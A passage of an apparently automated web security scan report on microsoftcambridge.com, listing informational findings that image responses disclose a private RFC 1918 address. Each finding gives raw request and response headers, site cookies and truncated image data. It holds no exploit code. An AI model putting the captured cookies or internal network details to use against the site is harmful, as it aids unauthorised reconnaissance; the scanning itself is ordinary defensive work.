Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 18:53:37 GMT
Content-Length: 45436
Date: Sat, 26 Mar 2011 01:43:53 GMT
X-Varnish: 1939122637
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   ...............................................................................................X..
...[SNIP]...
24.69. http://microsoftcambridge.com/Portals/0/teams/MNIOL-header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/MNIOL-header.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/MNIOL-header.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftNovellInteroperability/tabid/342/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 18:53:39 GMT
Content-Length: 14210
Date: Sat, 26 Mar 2011 01:43:40 GMT
X-Varnish: 1939118517
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................X..
...[SNIP]...
24.70. http://microsoftcambridge.com/Portals/0/teams/app_v_header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/app_v_header.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/app_v_header.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/ApplicationVirtualization/tabid/83/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:56:27 GMT
Content-Length: 22458
Date: Sat, 26 Mar 2011 01:44:03 GMT
X-Varnish: 1939125844
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................^..
...[SNIP]...
24.71. http://microsoftcambridge.com/Portals/0/teams/app_v_inline.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/app_v_inline.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/app_v_inline.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/ApplicationVirtualization/tabid/83/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:56:29 GMT
Content-Length: 13895
Date: Sat, 26 Mar 2011 01:44:03 GMT
X-Varnish: 1939125845
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
24.72. http://microsoftcambridge.com/Portals/0/teams/app_virt.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/app_virt.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/app_virt.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:32:13 GMT
Content-Length: 5017
Date: Sat, 26 Mar 2011 01:42:15 GMT
X-Varnish: 1939093165
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2........h...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
24.73. http://microsoftcambridge.com/Portals/0/teams/csa_conc.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/csa_conc.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/csa_conc.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 13 Feb 2009 18:57:16 GMT
Content-Length: 4883
Date: Sat, 26 Mar 2011 01:42:16 GMT
X-Varnish: 1939093448
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2.....h..V....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.74. http://microsoftcambridge.com/Portals/0/teams/csa_header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/csa_header.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/csa_header.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/SoftwareServicesConceptDevelopment/tabid/84/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:32:19 GMT
Content-Length: 35264
Date: Sat, 26 Mar 2011 01:43:54 GMT
X-Varnish: 1939122998
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......G......Adobe.d......................................
......

.....
.............................

...............................................................X..
...[SNIP]...
24.75. http://microsoftcambridge.com/Portals/0/teams/csa_inline.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/csa_inline.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/csa_inline.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/SoftwareServicesConceptDevelopment/tabid/84/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:32:20 GMT
Content-Length: 6491
Date: Sat, 26 Mar 2011 01:43:55 GMT
X-Varnish: 1939123034
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky..............Adobe.d..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@...........
...[SNIP]...
24.76. http://microsoftcambridge.com/Portals/0/teams/csacd.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/csacd.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/csacd.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/SoftwareServicesConceptDevelopment/tabid/84/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 13 Feb 2009 18:57:17 GMT
Content-Length: 4942
Date: Sat, 26 Mar 2011 01:43:53 GMT
X-Varnish: 1939122655
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................-....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.77. http://microsoftcambridge.com/Portals/0/teams/feature_dbrent.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/feature_dbrent.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/feature_dbrent.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftOnlineServices/tabid/175/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:01:52 GMT
Content-Length: 15549
Date: Sat, 26 Mar 2011 01:43:45 GMT
X-Varnish: 1939120475
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

..................................................................
...[SNIP]...
24.78. http://microsoftcambridge.com/Portals/0/teams/feature_jhowe.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/feature_jhowe.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/feature_jhowe.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/UnifiedCommunications/tabid/102/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:01:53 GMT
Content-Length: 15805
Date: Sat, 26 Mar 2011 01:43:42 GMT
X-Varnish: 1939119477
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

..................................................................
...[SNIP]...
24.79. http://microsoftcambridge.com/Portals/0/teams/feature_tsingh.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/feature_tsingh.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/feature_tsingh.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/ISC/tabid/341/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 19:01:57 GMT
Content-Length: 17809
Date: Sat, 26 Mar 2011 01:43:53 GMT
X-Varnish: 1939122650
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

..................................................................
...[SNIP]...
24.80. http://microsoftcambridge.com/Portals/0/teams/fuse.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/fuse.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/fuse.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/FuseLabs/tabid/82/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 08 Oct 2009 14:20:55 GMT
Content-Length: 4802
Date: Sat, 26 Mar 2011 01:44:01 GMT
X-Varnish: 1939124641
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.............j}......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.81. http://microsoftcambridge.com/Portals/0/teams/fuseimg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/fuseimg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/fuseimg.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/FuseLabs/tabid/82/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 16 Apr 2010 20:52:09 GMT
Content-Length: 25481
Date: Sat, 26 Mar 2011 01:44:00 GMT
X-Varnish: 1939124637
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................X..
...[SNIP]...
24.82. http://microsoftcambridge.com/Portals/0/teams/iscteam.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/iscteam.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/iscteam.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/ISC/tabid/341/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 12 Mar 2010 18:53:20 GMT
Content-Length: 4824
Date: Sat, 26 Mar 2011 01:43:52 GMT
X-Varnish: 1939122281
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...............Ek....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.83. http://microsoftcambridge.com/Portals/0/teams/mav.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/mav.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/mav.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/ApplicationVirtualization/tabid/83/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:32:25 GMT
Content-Length: 4509
Date: Sat, 26 Mar 2011 01:44:03 GMT
X-Varnish: 1939125804
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...............H.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.84. http://microsoftcambridge.com/Portals/0/teams/mrne.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/mrne.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/mrne.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:32:29 GMT
Content-Length: 4597
Date: Sat, 26 Mar 2011 01:43:57 GMT
X-Varnish: 1939123634
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................$....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.85. http://microsoftcambridge.com/Portals/0/teams/msft_advert.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/msft_advert.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/msft_advert.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:32:31 GMT
Content-Length: 7086
Date: Sat, 26 Mar 2011 01:42:17 GMT
X-Varnish: 1939093640
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......2........h...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
24.86. http://microsoftcambridge.com/Portals/0/teams/msft_research.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/teams/msft_research.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/teams/msft_research.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:32:35 GMT
Content-Length: 4776
Date: Sat, 26 Mar 2011 01:42:15 GMT
X-Varnish: 1939093289
Age: 0
Connection: keep-alive
